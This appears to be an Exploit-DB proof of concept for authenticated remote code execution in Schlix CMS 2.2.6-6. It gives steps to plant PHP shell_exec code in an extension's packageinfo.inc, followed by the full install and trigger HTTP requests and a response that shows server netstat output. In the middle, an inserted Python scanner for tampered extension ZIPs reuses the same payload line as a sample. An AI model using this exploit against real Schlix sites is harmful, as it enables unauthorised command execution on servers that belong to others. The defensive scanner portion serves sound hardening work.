Schlix CMS 2.2.6-6 – Remote Code Execution (Authenticated)

  • Author: Eren Saraç
    Date: 2021-05-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49838/
  • # Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
    # Date: 2021-05-06
    # Exploit Author: Eren Saraç
    # Vendor Homepage: https://www.schlix.com/
    # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
    # Version: 2.2.6-6
    # Tested on: Windows & WampServer
    
    ==> Tutorial <==
    
    1- Log in with your account.
    2- Go to the block management section at '/admin/app/core.blockmanager'.
    3- Create a new category.
    4- Download the 'mailchimp' extension from https://github.com/calip/app_mailchimp.
    5- Open the 'packageinfo.inc' file in the '/blocks/mailchimp' directory.
    6- Paste the PHP code below into the file (inside the existing PHP block, before the closing tag) and save it.
    #####################################
    $command = shell_exec('netstat -an');
    echo "<pre>$command</pre>";
    
    ?>
    #####################################
    
    7- Compress the extension into a ZIP archive named 'combo_mailchimp-1_0_1'.
    8- Install the package into the category you created and open the installed 'mailchimp' extension.
    9- Click the 'About' tab; the PHP code in 'packageinfo.inc' is executed.
    
    ==> Vulnerable 'packageinfo.inc' file (mailchimp extension) <==
    
    <?php
    
    $name = 'mailchimp';
    $type = 'block';
    $guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
    $version = '1.0';
    $license = 'MIT';
    $description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.';
    $author = 'Alip';
    $url = 'https://github.com/calip/app_mailchimp';
    $email = 'asalip.putra@gmail.com';
    $copyright = 'Copyright &copy;2019 calip';
    $command = shell_exec('netstat -an');
    echo "<pre>$command</pre>";
    
    ?>
    
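The root cause shown above is that the installer treats 'packageinfo.inc' as executable PHP, so any statement added to the metadata file runs with the web server's privileges as soon as the About tab includes it. The following pre-install check is an added example, not Schlix's own code: it opens an uploaded extension ZIP in memory, rejects archive entries that could escape the install directory, and only accepts a 'packageinfo.inc' made up of plain scalar assignments, so that the metadata can be read by a parser instead of the PHP interpreter. The archive layout ('mailchimp/packageinfo.inc'), the "scalar assignments only" rule and the sample files are assumptions constructed for the example.

```python
import io
import re
import zipfile
from typing import Dict, List

# A metadata file is expected to contain nothing but lines of the form
#   $name = 'value';   $version = 1.0;
# Anything else (function calls, echo, includes) is a sign of tampering.
SCALAR_ASSIGNMENT = re.compile(
    r"""^\$[A-Za-z_]\w*\s*=\s*(?:'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*"|\d+(?:\.\d+)?)\s*;$"""
)


def check_packageinfo(source: str) -> List[str]:
    """Return the lines of a packageinfo.inc that are not plain scalar assignments.

    An empty list means the file only declares metadata and never needs to be
    handed to the PHP interpreter.
    """
    violations = []
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        # Tolerate the PHP open/close tags the real files carry.
        if line.startswith("<?php"):
            line = line[5:].strip()
        if line.endswith("?>"):
            line = line[:-2].strip()
        if not line or line.startswith(("//", "#")):
            continue
        if not SCALAR_ASSIGNMENT.match(line):
            violations.append("line %d: %s" % (lineno, line))
    return violations


def scan_extension_zip(data: bytes) -> Dict[str, object]:
    """Inspect an uploaded extension archive before anything is extracted or included."""
    report = {"packageinfo_found": False, "violations": [], "unsafe_paths": []}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            parts = info.filename.replace("\\", "/").split("/")
            # Entries with absolute or parent-relative paths could land outside /blocks.
            if info.filename.startswith("/") or ".." in parts:
                report["unsafe_paths"].append(info.filename)
                continue
            if parts[-1] == "packageinfo.inc":
                report["packageinfo_found"] = True
                text = archive.read(info).decode("utf-8", errors="replace")
                report["violations"].extend(check_packageinfo(text))
    return report


def verdict(report: Dict[str, object]) -> str:
    """Accept only archives with a clean metadata file and no unsafe paths."""
    if report["packageinfo_found"] and not report["violations"] and not report["unsafe_paths"]:
        return "accept"
    return "reject"


def build_sample_zip(packageinfo: str, extra_entries=()) -> bytes:
    """Construct an in-memory archive laid out like the mailchimp block (assumed layout)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("mailchimp/packageinfo.inc", packageinfo)
        archive.writestr("mailchimp/block.mailchimp.php", "<?php // block code (constructed placeholder)\n")
        for name, content in extra_entries:
            archive.writestr(name, content)
    return buf.getvalue()


# Constructed samples: metadata as shipped, and the same file with the two lines
# the advisory adds.
CLEAN_PACKAGEINFO = """<?php
$name = 'mailchimp';
$type = 'block';
$version = '1.0';
$license = 'MIT';
$copyright = 'Copyright &copy;2019 calip';
?>
"""

TAMPERED_PACKAGEINFO = CLEAN_PACKAGEINFO.replace(
    "?>\n",
    "$command = shell_exec('netstat -an');\necho \"<pre>$command</pre>\";\n?>\n",
)

if __name__ == "__main__":
    for label, text in (("clean", CLEAN_PACKAGEINFO), ("tampered", TAMPERED_PACKAGEINFO)):
        report = scan_extension_zip(build_sample_zip(text))
        print(label, verdict(report), report)
```

Running the block prints `clean accept` and `tampered reject`, the latter listing the `shell_exec` and `echo` lines. The same whitelist approach also lets the installer read `$name`, `$version` and friends with a regex and never include the file at all, which removes the execution path rather than just detecting it.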
    ==> HTTP Request (ZIP Extension Installation) <==
    
    POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
    Host: (HOST)
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
    Accept: */*
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-Schlix-Ajax: 1
    Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
    Content-Length: 51585
    Origin: http(s)://(ORIGIN)
    Connection: close
    Referer: http(s)://(REFERER)/admin/app/core.blockmanager
    Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
    
    -----------------------------29322337091578227221515354130
    Content-Disposition: form-data; name="_csrftoken"
    
    a3b9a0da8d6be08513f60d1744e2642df0702ff7
    -----------------------------29322337091578227221515354130
    Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
    Content-Type: application/x-zip-compressed
    
    #############################################
    #############################################
    #############################################
    #############################################
    #############################################
    #############################################
    #############################################
    #############################################
    #############################################
    #############################################
    
    -----------------------------29322337091578227221515354130
    Content-Disposition: form-data; name="MAX_FILE_SIZE"
    
    2097152
    -----------------------------29322337091578227221515354130
    Content-Disposition: form-data; name="zipfileupload__total_file_size"
    
    0
    -----------------------------29322337091578227221515354130
    Content-Disposition: form-data; name="zipfileupload__max_file_count"
    
    20
    -----------------------------29322337091578227221515354130
    Content-Disposition: form-data; name="password"
    
    # Your ACC Password.
    -----------------------------29322337091578227221515354130--
    
    
    ==> HTTP Request (RCE - About Tab) <==
    
    GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
    Host: (HOST)
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http(s)://(HOST)/
    Connection: close
    Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
    Upgrade-Insecure-Requests: 1
    
    
    ==> HTTP Response (RCE - About Tab) <==
    
    HTTP/1.1 200 OK
    Date: Wed, 05 May 2021 21:49:24 GMT
    Server: Apache/2.4.46 (Win64) PHP/7.3.21
    X-Powered-By: PHP/7.3.21
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 49575
    
    <!DOCTYPE html>
    <html>
    <body>
    <div id="tab_options" class="schlixui-childtab">
    <pre>
    Active Connections
    
    Proto  Local Address                        Foreign Address                      State
    TCP    0.0.0.0:80                           0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:135                          0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:445                          0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:902                          0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:912                          0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:3306                         0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:3307                         0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:5040                         0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:7680                         0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:49664                        0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:49665                        0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:49666                        0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:49667                        0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:49668                        0.0.0.0:0                            LISTENING
    TCP    0.0.0.0:50296                        0.0.0.0:0                            LISTENING
    TCP    127.0.0.1:80                         127.0.0.1:58843                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58853                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58854                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58859                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58860                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58865                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58868                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58883                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58893                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58894                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58899                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58902                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58908                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58918                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58919                      TIME_WAIT
    TCP    127.0.0.1:80                         127.0.0.1:58924                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58886                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58887                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58888                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58891                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58905                      CLOSE_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58907                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58911                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58913                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58915                      TIME_WAIT
    TCP    127.0.0.1:8080                       127.0.0.1:58916                      TIME_WAIT
    TCP    127.0.0.1:58424                      127.0.0.1:58425                      ESTABLISHED
    TCP    127.0.0.1:58425                      127.0.0.1:58424                      ESTABLISHED
    TCP    127.0.0.1:58435                      127.0.0.1:58436                      ESTABLISHED
    TCP    127.0.0.1:58436                      127.0.0.1:58435                      ESTABLISHED
    TCP    127.0.0.1:58565                      127.0.0.1:58566                      ESTABLISHED
    TCP    127.0.0.1:58566                      127.0.0.1:58565                      ESTABLISHED
    TCP    127.0.0.1:58639                      127.0.0.1:58640                      ESTABLISHED
    TCP    127.0.0.1:58640                      127.0.0.1:58639                      ESTABLISHED
    TCP    169.254.22.167:139                   0.0.0.0:0                            LISTENING
    TCP    169.254.224.26:139                   0.0.0.0:0                            LISTENING
    TCP    192.168.1.8:139                      0.0.0.0:0                            LISTENING
    TCP    192.168.1.8:49500                    95.101.14.77:443                     ESTABLISHED
    TCP    192.168.1.8:57059                    162.159.129.235:443                  ESTABLISHED
    TCP    192.168.1.8:57902                    162.159.138.234:443                  ESTABLISHED
    TCP    192.168.1.8:58453                    44.235.189.138:443                   ESTABLISHED
    TCP    192.168.1.8:58626                    162.159.138.232:443                  ESTABLISHED
    TCP    192.168.1.8:58627                    162.159.133.234:443                  ESTABLISHED
    TCP    192.168.1.8:58699                    162.159.135.232:443                  ESTABLISHED
    TCP    192.168.1.8:58841                    20.44.232.74:443                     ESTABLISHED
    TCP    192.168.1.8:58942                    162.159.138.232:443                  ESTABLISHED
    TCP    192.168.1.8:58951                    138.68.92.190:443                    ESTABLISHED
    TCP    192.168.1.8:60549                    51.103.5.159:443                     ESTABLISHED
    TCP    192.168.1.8:60610                    104.66.70.197:443                    ESTABLISHED
    TCP    192.168.1.8:60611                    104.66.70.197:443                    ESTABLISHED
    TCP    192.168.1.8:60612                    217.31.233.104:443                   CLOSE_WAIT
    TCP    [::]:80                              [::]:0                               LISTENING
    TCP    [::]:135                             [::]:0                               LISTENING
    TCP    [::]:445                             [::]:0                               LISTENING
    TCP    [::]:3306                            [::]:0                               LISTENING
    TCP    [::]:3307                            [::]:0                               LISTENING
    TCP    [::]:7680                            [::]:0                               LISTENING
    TCP    [::]:49664                           [::]:0                               LISTENING
    TCP    [::]:49665                           [::]:0                               LISTENING
    TCP    [::]:49666                           [::]:0                               LISTENING
    TCP    [::]:49667                           [::]:0                               LISTENING
    TCP    [::]:49668                           [::]:0                               LISTENING
    TCP    [::]:50296                           [::]:0                               LISTENING
    TCP    [::1]:3306                           [::1]:58845                          TIME_WAIT
    TCP    [::1]:3306                           [::1]:58856                          TIME_WAIT
    TCP    [::1]:3306                           [::1]:58857                          TIME_WAIT
    TCP    [::1]:3306                           [::1]:58858                          TIME_WAIT
    TCP    [::1]:3306                           [::1]:58932                          TIME_WAIT
    TCP    [::1]:3306                           [::1]:58935                          TIME_WAIT
    TCP    [::1]:3306                           [::1]:58940                          TIME_WAIT
    TCP    [::1]:3306                           [::1]:58950                          TIME_WAIT
    TCP    [::1]:3306                           [::1]:58953                          ESTABLISHED
    TCP    [::1]:3306                           [::1]:58954                          ESTABLISHED
    TCP    [::1]:49485                          [::1]:49486                          ESTABLISHED
    TCP    [::1]:49486                          [::1]:49485                          ESTABLISHED
    TCP    [::1]:49669                          [::]:0                               LISTENING
    TCP    [::1]:58844                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58845                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58855                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58856                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58857                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58858                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58861                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58862                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58863                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58864                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58866                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58867                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58869                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58870                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58884                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58885                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58929                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58930                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58931                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58932                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58934                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58935                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58939                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58940                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58946                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58947                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58949                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58950                          [::1]:3306                           TIME_WAIT
    TCP    [::1]:58953                          [::1]:3306                           ESTABLISHED
    TCP    [::1]:58954                          [::1]:3306                           ESTABLISHED
    UDP    0.0.0.0:5050                         *:*
    UDP    0.0.0.0:5353                         *:*
    UDP    0.0.0.0:5355                         *:*
    UDP    0.0.0.0:53240                        *:*
    UDP    0.0.0.0:53241                        *:*
    UDP    127.0.0.1:1900                       *:*
    UDP    127.0.0.1:62353                      *:*
    UDP    127.0.0.1:63129                      *:*
    UDP    192.168.1.8:137                      *:*
    UDP    192.168.1.8:138                      *:*
    UDP    192.168.1.8:1900                     *:*
    UDP    192.168.1.8:2177                     *:*
    UDP    192.168.1.8:63128                    *:*
    UDP    [::]:5353                            *:*
    UDP    [::]:5355                            *:*
    UDP    [::1]:1900                           *:*
    UDP    [::1]:63125                          *:*
    UDP    [fe80::e4d5:62f5:da3:2dae%21]:1900   *:*
    UDP    [fe80::e4d5:62f5:da3:2dae%21]:2177   *:*
    UDP    [fe80::e4d5:62f5:da3:2dae%21]:63124  *:*
    </pre>
    <div class="content">
    <div class="row">
    <div class="col-xs-12">
    <div class="text-center">
    <h1>mailchimp</h1>
    <p>v1.0</p><p>Author: <a href="mailto:asalip.putra@gmail.com">Alip</a></p> 
    <p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p> 
    <p><a href="https://www.exploit-db.com/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p>
    </div>
     </div> 
    </div>
    </div>
    </div>
    </body>